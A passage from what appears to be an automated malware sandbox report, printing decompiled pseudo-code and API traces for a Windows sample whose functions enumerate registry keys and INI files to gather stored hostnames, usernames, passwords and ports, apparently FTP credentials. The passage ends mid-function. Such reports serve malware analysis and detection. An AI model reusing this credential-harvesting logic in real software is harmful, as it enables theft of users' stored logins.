Opcode Fuzzy Hash: 00ad86c78921f555b2750e010b1ab6502140692f7f546da3edaec4ee2554cb13
Instruction Fuzzy Hash: 4FE0923160C201BADF0457A19C06F9B32A84B40BADF1406699110E51C0DB78EA449118

Uniqueness

Uniqueness Score: -1.00%

Function 004072BF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004072BF(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;
				intOrPtr _t9;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x4228c0);
					_t7 = E00406C86(_a4);
					if(_t7 != 0xffffffff) {
						_t9 =  *0x4228d8; // 0x0
						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
					}
					LeaveCriticalSection(0x4228c0);
					return _t7;
				}
				return _t6;
			}

0x004072c4
0x004072d5
0x004072df
0x004072e7
0x004072e9
0x004072f6
0x004072f6
0x004072fd
0x00000000
0x00407304
0x00407305

APIs

EnterCriticalSection.KERNEL32(004228C0), ref: 004072D5
SetEvent.KERNEL32(?), ref: 004072F6
LeaveCriticalSection.KERNEL32(004228C0), ref: 004072FD

Strings

3, xrefs: 004072C6

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: e1dcf17b7c2cf0c47dc445bebf5b05363395469a461e1c86793b1d434a0ada6f
Instruction ID: 177c6b338cad148803c455502c3679f2083353f09032a2f4fb7f4d57dd9b470f
Opcode Fuzzy Hash: e1dcf17b7c2cf0c47dc445bebf5b05363395469a461e1c86793b1d434a0ada6f
Instruction Fuzzy Hash: 1BE09231508200AFC3206B25AE4881A7B64EBD2331701C27EF416F21F0C738D852DF2A

Uniqueness

Uniqueness Score: -1.00%

Function 004143EC, Relevance: 6.3, APIs: 4, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E004143EC(void* __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v80;
				struct _SYSTEMTIME _v96;
				char _v112;
				short _v184;
				short _v288;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				signed char _t163;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				signed int _t186;
				long _t191;
				long _t195;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				short* _t230;
				signed int _t238;
				intOrPtr _t239;
				void* _t244;

				_t239 = _a4;
				_t126 =  *((intOrPtr*)(_t239 + 0x40));
				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
					_t127 = E0041BF16( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
					_t238 = _t127;
					_v64 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						L55:
						E004163A8(_v64);
						__eflags = 0 -  *(_t239 + 0x3c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t131 = _v12;
					__eflags = _t131 - 0x10;
					if(_t131 <= 0x10) {
						goto L55;
					}
					__eflags =  *((char*)(_t239 + 0x18)) - 1;
					_v16 = 1;
					_t132 = _t131 + _t238;
					__eflags = _t132;
					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t132;
					while(1) {
						_t133 =  *(_t238 + 2) & 0x0000ffff;
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							goto L55;
						}
						_t219 =  *(_t238 + 4) & 0x0000ffff;
						__eflags = _t219 - _t133;
						if(_t219 >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 6) - _t133;
						if( *(_t238 + 6) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 8) - _t133;
						if( *(_t238 + 8) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xa) - _t133;
						if( *(_t238 + 0xa) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xc) - _t133;
						if( *(_t238 + 0xc) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xe) - _t133;
						if( *(_t238 + 0xe) >= _t133) {
							goto L55;
						}
						_t134 =  *_t238 & 0x0000ffff;
						_t208 = _t134 >> 0x00000009 & 0x00000008;
						_t220 = _t238 + _t219;
						__eflags = (_t134 & _v28) - _v28;
						if((_t134 & _v28) != _v28) {
							L48:
							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
							_t102 = _t238 + 0x10; // 0x10
							__eflags = _t102 - _v12;
							if(_t102 > _v12) {
								goto L55;
							}
							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
								goto L55;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t234 = _t208;
						_t140 = E004140C9(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
						__eflags = _t140;
						if(_t140 == 0) {
							goto L48;
						}
						_t141 =  *(_t239 + 0x44);
						__eflags =  *(_t239 + 0x44);
						if(__eflags == 0) {
							L16:
							_t142 =  *(_t238 + 8) & 0x0000ffff;
							__eflags = _t142;
							if(_t142 == 0) {
								L18:
								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
								__eflags = _t143;
								if(_t143 == 0) {
									L20:
									__eflags =  *_t238 & 0x00000010;
									if(( *_t238 & 0x00000010) == 0) {
										L31:
										E0041645B( &_v60,  &_v60, 0, 0x1c);
										_v60 =  *_t238 & 0x0000ffff;
										_t209 = _t208 | 0xffffffff;
										_v56 = E00416806(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
										_t151 =  *(_t238 + 6) & 0x0000ffff;
										__eflags = _t151;
										if(_t151 != 0) {
											__eflags = _t151 + _t238;
											_v52 = E00416806(_t209, _t151 + _t238);
										} else {
											_v52 = _v52 & 0x00000000;
										}
										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t155 + _t238;
											_v48 = E00416806(_t209, _t155 + _t238);
										} else {
											_v48 = _v48 & 0x00000000;
										}
										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
										__eflags = _t159;
										if(_t159 != 0) {
											__eflags = _t159 + _t238;
											_v44 = E00416806(_t209, _t159 + _t238);
										} else {
											_v44 = _v44 & 0x00000000;
										}
										_t163 =  *_t238 & 0x0000ffff;
										__eflags = _t163 & 0x00000003;
										if((_t163 & 0x00000003) != 0) {
											E0041532C( *(_t239 + 0x3c),  *(_t239 + 0x38));
											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
											_t167 = E004163FB(__eflags,  &_v60, 0x1c);
											 *(_t239 + 0x38) = _t167;
											__eflags = _t167;
											if(_t167 == 0) {
												E00415303( &_v60);
												_t239 = _a4;
											} else {
												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
											}
											goto L55;
										} else {
											__eflags = _t163 & 0x0000000c;
											if(__eflags == 0) {
												E00415303( &_v60);
												L47:
												_t239 = _a4;
												goto L48;
											}
											_t211 = E0041BF16( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
											_v40 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L54:
												E004163A8(_t211);
												E00415303( &_v60);
												_t239 = _a4;
												E0041532C( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
												_t122 = _t239 + 0x3c;
												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
												__eflags =  *_t122;
												goto L55;
											}
											_t176 = E0041C5E8(_t211, _v36);
											__eflags = _t176;
											if(_t176 == 0) {
												goto L54;
											}
											_t177 = E00416333(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
											__eflags = _t177;
											if(_t177 == 0) {
												goto L54;
											}
											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
											E004163E4( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
											goto L47;
										}
									}
									__eflags =  *(_t238 + 0xc);
									if( *(_t238 + 0xc) <= 0) {
										goto L31;
									}
									E0040F16A( &_v184, _t220, 1,  &_v288);
									_t186 = E0041764D( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E00416EE5(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
									__eflags = _t186;
									if(_t186 == 0) {
										goto L48;
									}
									_t230 =  &_v184;
									_t212 = 0;
									__eflags = 0;
									do {
										E00416710( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
										_t212 = _t212 + 1;
										_t230 = _t230 + 4;
										__eflags = _t212 - 0x10;
									} while (_t212 < 0x10);
									_v32 = _v32 | 0xffffffff;
									_t208 = 0x10;
									 *_t230 = 0;
									_v24 = _t208;
									_v20 = 0x80000001;
									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
									__eflags = _t191;
									if(_t191 != 0) {
										goto L31;
									}
									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
									__eflags = _t195;
									if(_t195 == 0) {
										_v32 = _v24;
									}
									RegCloseKey(_v20);
									__eflags = _v32 - _t208;
									if(_v32 == _t208) {
										GetLocalTime( &_v96);
										__eflags = _v74 - _v96.wDay;
										if(_v74 != _v96.wDay) {
											goto L31;
										}
										__eflags = _v78 - _v96.wMonth;
										if(_v78 == _v96.wMonth) {
											goto L48;
										}
									}
									goto L31;
								}
								_t220 = _t238 + _t143;
								_t201 = E004140FE(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
								__eflags = _t201;
								if(_t201 == 0) {
									goto L48;
								}
								goto L20;
							}
							_t220 = _t238 + _t142;
							_t202 = E004140FE(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
							__eflags = _t202 - 1;
							if(_t202 == 1) {
								goto L48;
							}
							goto L18;
						}
						_t203 = E00414384(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
						__eflags = _t203;
						if(_t203 != 0) {
							goto L48;
						}
						goto L16;
					}
					goto L55;
				}
				return 0;
			}

0x004143f7
0x004143fa
0x00414400
0x00414417
0x0041441c
0x00414420
0x00414424
0x00414426
0x00414429
0x0041442b
0x0041478e
0x00414791
0x00414798
0x0041479b
0x00000000
0x0041479d
0x00414431
0x00414434
0x00414437
0x00000000
0x00000000
0x0041443f
0x00414443
0x00414457
0x00414457
0x00414459
0x0041445c
0x0041445f
0x0041445f
0x00414463
0x00414466
0x00000000
0x00000000
0x0041446c
0x00414470
0x00414473
0x00000000
0x00000000
0x00414479
0x0041447d
0x00000000
0x00000000
0x00414483
0x00414487
0x00000000
0x00000000
0x0041448d
0x00414491
0x00000000
0x00000000
0x00414497
0x0041449b
0x00000000
0x00000000
0x004144a1
0x004144a5
0x00000000
0x00000000
0x004144ab
0x004144b6
0x004144b9
0x004144bc
0x004144c0
0x00414718
0x0041471c
0x0041471e
0x00414721
0x00414724
0x00000000
0x00000000
0x0041472c
0x0041472f
0x00000000
0x00000000
0x00414731
0x00000000
0x00414731
0x004144c9
0x004144ce
0x004144d3
0x004144d5
0x00000000
0x00000000
0x004144db
0x004144de
0x004144e0
0x004144f9
0x004144f9
0x004144fd
0x00414500
0x00414518
0x00414518
0x0041451c
0x0041451f
0x00414537
0x00414537
0x0041453a
0x0041461e
0x00414626
0x0041462e
0x00414638
0x00414642
0x00414645
0x00414649
0x0041464c
0x00414654
0x0041465e
0x0041464e
0x0041464e
0x0041464e
0x00414661
0x00414665
0x00414668
0x00414670
0x0041467a
0x0041466a
0x0041466a
0x0041466a
0x0041467d
0x00414681
0x00414684
0x0041468c
0x00414696
0x00414686
0x00414686
0x00414686
0x00414699
0x0041469c
0x0041469e
0x0041473f
0x00414744
0x0041474e
0x00414753
0x00414756
0x00414758
0x00414762
0x00414767
0x0041475a
0x0041475a
0x0041475a
0x00000000
0x004146a4
0x004146a4
0x004146a6
0x00414710
0x00414715
0x00414715
0x00000000
0x00414715
0x004146bb
0x004146bd
0x004146c0
0x004146c2
0x0041476c
0x0041476d
0x00414775
0x00414780
0x00414785
0x0041478a
0x0041478a
0x0041478a
0x00000000
0x0041478a
0x004146cd
0x004146d2
0x004146d4
0x00000000
0x00000000
0x004146e4
0x004146e9
0x004146eb
0x00000000
0x00000000
0x004146fc
0x00414706
0x00000000
0x00414706
0x0041469e
0x00414540
0x00414545
0x00000000
0x00000000
0x0041455a
0x00414570
0x00414575
0x00414577
0x00000000
0x00000000
0x0041457d
0x00414583
0x00414583
0x00414585
0x00414589
0x0041458e
0x0041458f
0x00414592
0x00414592
0x00414597
0x0041459d
0x004145a0
0x004145b8
0x004145bb
0x004145be
0x004145c4
0x004145c6
0x00000000
0x00000000
0x004145de
0x004145e4
0x004145e6
0x004145eb
0x004145eb
0x004145f1
0x004145f7
0x004145fa
0x00414600
0x0041460a
0x0041460e
0x00000000
0x00000000
0x00414614
0x00414618
0x00000000
0x00000000
0x00414618
0x00000000
0x004145fa
0x00414524
0x0041452a
0x0041452f
0x00414531
0x00000000
0x00000000
0x00000000
0x00414531
0x00414505
0x0041450b
0x00414510
0x00414512
0x00000000
0x00000000
0x00000000
0x00414512
0x004144ec
0x004144f1
0x004144f3
0x00000000
0x00000000
0x00000000
0x004144f3
0x00000000
0x0041445f
0x00000000

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549c8fd7c8845962dd7e0c6614f4eb6eb566c626bd0a5ccfaa853051ac47b783
Instruction ID: 5e39f14e75ecc2cf47a29b0b4bfa95de390f6d41d3a746493c8dd36469c36768
Opcode Fuzzy Hash: 549c8fd7c8845962dd7e0c6614f4eb6eb566c626bd0a5ccfaa853051ac47b783
Instruction Fuzzy Hash: 23B1B170900219ABDB20EF95C881BFEB7B4BF45714F40441AF961E7691E778E9C1CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDFD, Relevance: 6.2, APIs: 4, Instructions: 184
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040BDFD(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				intOrPtr _t92;
				int _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				int _t120;
				void* _t125;
				void* _t132;
				void* _t135;
				void* _t136;

				_t119 = __edx;
				_t118 = __ecx;
				_t120 = 0;
				E0041645B( &_v32,  &_v32, 0, 8);
				_t65 = E00416378(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t120) {
						return E004163A8(_v32);
					}
					return E004099E1(_t119, _v32, 0xcb);
				} else {
					_v36 = _t65 + 0x3fc;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E0040FA33(0x8a,  &_v260);
					E0040FA33(0x8b,  &_v88);
					E0040FA33(0x8c,  &_v132);
					E0040FA33(0x8d,  &_v68);
					E0040FA33(0x8e,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t120;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t122 = _v16;
							_v24 = _v24 + 1;
							_t92 = E0041A4CC(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 != 0) {
								_t132 = E0041A4CC(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t132 != 0xffffffff && _t132 != 0) {
									_t124 = _v36;
									_t104 = E0041A4CC(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 != 0 && E0040BD43(_t119, _t124, _t132 + _v40) > 0) {
										_t125 = E0041A582(_v8, _t118,  &_v780,  &_v132);
										if(_t125 < 1 || _t125 > 0xffff) {
											_t125 = 0x15;
										}
										_t134 =  &_v172;
										_t110 = 0x55;
										E0040FA33(_t110,  &_v172);
										_t112 = _v16;
										_t118 = _v36;
										_push(_t125);
										_push(_t112);
										_push(_t118);
										_push(_t112 + 0x1fe);
										_t119 = 0x311;
										_t126 = _t118 + 0x1fe;
										_t115 = E0041709B(_t134, 0x311, _t118 + 0x1fe, _t134);
										_t136 = _t136 + 0x14;
										if(_t115 > 0) {
											_t118 =  &_v32;
											if(E0041679C(_t115,  &_v32, _t126) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t120 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E004163A8(_v16);
					goto L22;
				}
			}

0x0040bdfd
0x0040bdfd
0x0040be0b
0x0040be12
0x0040be1c
0x0040be21
0x0040be26
0x0040c01f
0x0040c022
0x00000000
0x0040c03b
0x00000000
0x0040be2c
0x0040be31
0x0040be3f
0x0040be46
0x0040be4d
0x0040be5a
0x0040be67
0x0040be74
0x0040be81
0x0040be86
0x0040be8e
0x0040beab
0x00000000
0x00000000
0x0040bec4
0x0040bec7
0x0040bed6
0x0040c001
0x0040c004
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bfd3
0x0040bfe7
0x0040bff9
0x0040bedc
0x0040bedc
0x0040bedf
0x0040bef1
0x0040bef6
0x0040befc
0x0040bf24
0x0040bf29
0x0040bf37
0x0040bf49
0x0040bf4e
0x0040bf54
0x0040bf7a
0x0040bf7f
0x0040bf8b
0x0040bf8b
0x0040bf8e
0x0040bf94
0x0040bf95
0x0040bf9a
0x0040bf9d
0x0040bfa0
0x0040bfa1
0x0040bfa2
0x0040bfa8
0x0040bfac
0x0040bfb1
0x0040bfb7
0x0040bfbc
0x0040bfc1
0x0040bfc4
0x0040bfce
0x0040bfd0
0x0040bfd0
0x0040bfce
0x0040bfc1
0x0040bf54
0x0040bf29
0x00000000
0x0040bfff
0x0040bfff
0x00000000
0x0040bfff
0x0040c00a
0x0040c00a
0x0040c00d
0x0040c01a
0x00000000
0x0040c01a

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040BEA3
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040BECE
RegCloseKey.ADVAPI32(?), ref: 0040C004

Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040BFF1

Part of subcall function 0041A4CC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040E535,?,?,00000104), ref: 0041A562

Part of subcall function 0041A582: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00406E96,?,?), ref: 0041A59A

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: b9edb49341048ffdca3e764c04b29dfcab4fc4b415c2259f5ce213791859adc4
Instruction ID: 9db0dfbf60430dfd33d01ee4be052f3dc0f7ae82ddf8c9aa1bfb722658f3152f
Opcode Fuzzy Hash: b9edb49341048ffdca3e764c04b29dfcab4fc4b415c2259f5ce213791859adc4
Instruction Fuzzy Hash: 99517C72D00219ABDB10DBD5CC45AEFB7BCEB44304F100176F914F3291D7389A858BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C391, Relevance: 6.2, APIs: 4, Instructions: 176
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040C391(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				int _t81;
				int _t89;
				int _t93;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				int* _t109;
				char* _t113;
				void* _t114;
				void* _t122;

				_t107 = __ecx;
				_t109 = 0;
				E0041645B( &_v28,  &_v28, 0, 8);
				_t55 = E00416378(0xc1c);
				_v16 = _t55;
				if(_t55 == 0) {
					return _t55;
				}
				_v32 = _t55 + 0x3fc;
				E0040FA33(0x97,  &_v180);
				E0040FA33(0x98,  &_v64);
				E0040FA33(0x99,  &_v76);
				E0040FA33(0x9a,  &_v52);
				E0040FA33(0x9b,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E004163A8(_v16);
					if(_v24 <= _t109) {
						return E004163A8(_v28);
					}
					return E004099E1(0x311, _v28, 0xcb);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t111 = _v16;
						_v20 = _v20 + 1;
						_t81 = E0041A4CC(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
						_v12 = _t81;
						if(_t81 != 0xffffffff && _t81 != 0) {
							_t89 = E0041A4CC(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
							_v12 = _t89;
							if(_t89 != 0xffffffff && _t89 != 0) {
								_t113 = _v32;
								_t93 = E0041A4CC(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
								_v12 = _t93;
								if(_t93 != 0xffffffff && _t93 != 0) {
									_t107 = _t113;
									if(E00416EF7(_t113) > 0) {
										_t114 = E0041A582(_v8, _t107,  &_v700,  &_v76);
										if(_t114 < 1 || _t114 > 0xffff) {
											_t114 = 0x15;
										}
										_t121 =  &_v116;
										_t99 = 0x55;
										E0040FA33(_t99,  &_v116);
										_t101 = _v16;
										_t107 = _v32;
										_push(_t114);
										_push(_t101);
										_push(_t107);
										_push(_t101 + 0x1fe);
										_t115 = _t107 + 0x1fe;
										_t104 = E0041709B(_t121, 0x311, _t107 + 0x1fe, _t121);
										_t122 = _t122 + 0x14;
										if(_t104 > 0) {
											_t107 =  &_v28;
											if(E0041679C(_t104,  &_v28, _t115) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t109 = 0;
					goto L19;
				}
			}

0x0040c391
0x0040c39f
0x0040c3a6
0x0040c3b0
0x0040c3b5
0x0040c3ba
0x0040c5b4
0x0040c5b4
0x0040c3c5
0x0040c3d3
0x0040c3e0
0x0040c3ed
0x0040c3fa
0x0040c407
0x0040c427
0x0040c587
0x0040c58a
0x0040c592
0x00000000
0x0040c5ab
0x00000000
0x0040c5a1
0x0040c440
0x0040c443
0x0040c452
0x0040c57e
0x0040c581
0x00000000
0x0040c458
0x0040c45d
0x0040c45d
0x0040c460
0x0040c472
0x0040c477
0x0040c47d
0x0040c4a0
0x0040c4a5
0x0040c4ab
0x0040c4b9
0x0040c4cb
0x0040c4d0
0x0040c4d6
0x0040c4dc
0x0040c4e5
0x0040c4fa
0x0040c4ff
0x0040c50b
0x0040c50b
0x0040c50e
0x0040c511
0x0040c512
0x0040c517
0x0040c51a
0x0040c51d
0x0040c51e
0x0040c51f
0x0040c525
0x0040c52e
0x0040c534
0x0040c539
0x0040c53e
0x0040c541
0x0040c54b
0x0040c54d
0x0040c54d
0x0040c54b
0x0040c53e
0x0040c4e5
0x0040c4d6
0x0040c4ab
0x0040c564
0x0040c574
0x0040c57c
0x00000000
0x0040c57c

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040C41F
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040C44A
RegCloseKey.ADVAPI32(?), ref: 0040C581

Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040C56E

Part of subcall function 0041A4CC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040E535,?,?,00000104), ref: 0041A562

Part of subcall function 0041A582: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00406E96,?,?), ref: 0041A59A

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: ace445d2dded854746e8670399476770bb44f67fd2d11ae51dddb9b56113800f
Instruction ID: b735405ef8454f34d703f507aceed1cdfb7f1f4b518fd927111f8fa9b80eb64f
Opcode Fuzzy Hash: ace445d2dded854746e8670399476770bb44f67fd2d11ae51dddb9b56113800f
Instruction Fuzzy Hash: F5512276D00119BBDB10EBA5CD85AEFB7BCEF44304F100276B915F3291E734AA858B64

Uniqueness

Uniqueness Score: -1.00%

Function 004127E2, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004127E2(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t65;
				short _t66;
				void* _t67;
				WCHAR* _t70;
				long _t77;

				_t31 = 0x2a;
				E0040FA33(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E0041BC2F( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x2c;
						E0040FA33(_t36,  &_v112);
						_t33 = E0041BC2F( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x2d;
								E0040FA33(_t42,  &_v60);
								_t44 = 0x2e;
								E0040FA33(_t44,  &_v84);
								_t46 = 0x2f;
								E0040FA33(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t67 = 0xa;
									_t70 =  &_v40;
									_t50 = E0041709B( &_v60, _t67, _t70);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
									_t77 = _t50;
									if(_t77 == 0xffffffff) {
										break;
									}
